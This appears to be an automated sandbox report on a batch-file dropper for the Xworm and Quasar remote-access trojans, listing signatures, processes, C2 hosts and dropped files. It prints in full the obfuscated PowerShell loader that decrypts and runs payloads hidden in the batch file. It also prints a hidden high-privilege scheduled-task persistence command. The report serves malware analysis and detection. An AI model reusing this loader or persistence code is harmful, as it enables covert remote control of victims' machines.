Analysis Overview
SHA256
7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
Threat Level: Known bad
The file Double.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Quasar RAT
Quasar payload
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-13 17:59
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win10v2004-20240412-en
Max time kernel
54s
Max time network
63s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_330_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_330.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_330.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_330.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_330.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_330.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_585_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_585.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_585.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_585.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_585.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_585.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | traffic-collins.gl.at.ply.gg | udp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.118.77.104.in-addr.arpa | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiarmb3f.iuv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1240-9-0x000001ADB6F00000-0x000001ADB6F22000-memory.dmp
memory/1240-10-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/1240-11-0x000001ADB4DC0000-0x000001ADB4DD0000-memory.dmp
memory/1240-12-0x000001ADB4DC0000-0x000001ADB4DD0000-memory.dmp
memory/1240-13-0x000001ADB4DB0000-0x000001ADB4DB8000-memory.dmp
memory/1240-14-0x000001ADB7130000-0x000001ADB7270000-memory.dmp
memory/4476-16-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/4476-17-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp
memory/4476-18-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp
memory/4476-28-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp
memory/4476-31-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f8d49a4af7a844bfc7247d5670def557 |
| SHA1 | 26ae0ce194a77a7a1887cf93741293fdfa6c94c4 |
| SHA256 | 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b |
| SHA512 | 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c |
C:\Users\Admin\AppData\Roaming\startup_str_330.vbs
| MD5 | 20b8c2322d21131b9f33f7f8aa143e41 |
| SHA1 | 071b1e63bebd79345c9e62e8b81627fc639d611d |
| SHA256 | 0941acf3ffa1dc642b3b9913632e39fac19c63e97a3164159edb7edc5001f850 |
| SHA512 | 91c13b7188947250f5e19b8f64862fb3142198523094ba89b1fb0dcb50e12686dc4e147c084efe59cfcd3eb210ea623e6f38d60abb8d59960dff70d388306524 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\startup_str_330.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
memory/5096-50-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/5096-52-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
memory/5096-51-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
memory/5096-55-0x000001D6DE5B0000-0x000001D6DE8D4000-memory.dmp
memory/5096-56-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
memory/1240-60-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/5096-61-0x000001D6DEB50000-0x000001D6DEBA0000-memory.dmp
memory/5096-62-0x000001D6DEC60000-0x000001D6DED12000-memory.dmp
memory/5096-63-0x000001D6DFA00000-0x000001D6DFBC2000-memory.dmp
memory/2028-73-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/2028-74-0x000001E0B4F10000-0x000001E0B4F18000-memory.dmp
memory/2028-75-0x000001E0B4F70000-0x000001E0B4F7C000-memory.dmp
memory/4936-86-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/4936-87-0x000001F858C10000-0x000001F858C20000-memory.dmp
memory/4936-88-0x000001F858C10000-0x000001F858C20000-memory.dmp
memory/4936-90-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d51735559407dba515c4b8861b4c1a56 |
| SHA1 | 4902dbc4f4322b549c42ddec8d2e642c96491e9d |
| SHA256 | 24cf099c1f20992a70fb72d21f41b766178f71ee7585bac522c8dbb3ae06f263 |
| SHA512 | fe1a23a0273c2cbf7510023f4368d19b4aab362baae6a35698e29c8232aeaf8261fc9e351549a9d9aa1130230769e6d8206cbf757056400b5cbc823e2dcc010a |
C:\Users\Admin\AppData\Roaming\startup_str_585.vbs
| MD5 | 753fefb78d188fffd02e5630c438f15e |
| SHA1 | 54712eb2b053ab77eab8c43339ee1bfefe877c29 |
| SHA256 | 9151798d6f1e77daf9a6a495917d50bb3dc2f8b224fc29ee830caf4b3195fe26 |
| SHA512 | 558240ecabdcaeed3c2358fdebb718e49f7f2b5b4d4735c2c16809c727d88c5cca141b27af9ff0daccfb52208851a9251abd06ed2ac75cb496c228dc06da59fb |
memory/3180-103-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/3180-108-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp
memory/3180-109-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp
memory/3180-111-0x0000020D3FB20000-0x0000020D3FB2E000-memory.dmp
memory/2028-112-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/5096-113-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/5096-114-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
memory/5096-115-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
memory/5096-116-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp
memory/3180-117-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp
memory/3180-118-0x0000020D3FBD0000-0x0000020D3FBE0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win11-20240412-en
Max time kernel
54s
Max time network
62s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_824_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_824.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_824.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_824.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_824.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_824.bat').Split([Environment]::NewLine);foreach ($SAFER in 